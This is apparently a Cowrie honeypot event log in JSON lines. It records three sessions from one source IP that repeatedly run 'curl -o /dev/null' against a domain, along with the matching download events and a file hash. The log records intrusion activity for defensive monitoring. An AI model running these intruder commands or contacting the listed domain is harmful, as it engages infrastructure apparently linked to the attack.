{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.734930Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.738770Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.745309Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.746651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.747640Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.776740Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.778465Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.779073Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.784020Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.784773Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.788898Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.793841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.812679Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.813390Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.818194Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.819010Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.824982Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.826699Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.827435Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.855105Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.858468Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.861015Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.862038Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.865137Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.866006Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.869373Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.875444Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.877424Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.878325Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.913571Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.916148Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.918906Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.922442Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.923355Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.926049Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.926951Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.928990Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.929895Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.964337Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.967329Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.970555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.974940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.976130Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.976737Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.979111Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.980738Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.981971Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.982348Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.017629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.020061Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.021970Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.022644Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.025067Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.025693Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.027409Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.028679Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.065655Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.068274Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.069451Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.072751Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.073800Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.075829Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.076694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.133069Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.135710Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.138449Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.140851Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.142253Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.143110Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.145505Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.146178Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.147895Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.148985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.153958Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.157046Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.186589Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.188278Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.188987Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.191629Z","src_ip":"212.227.125.160","session":"9f264c568782"}
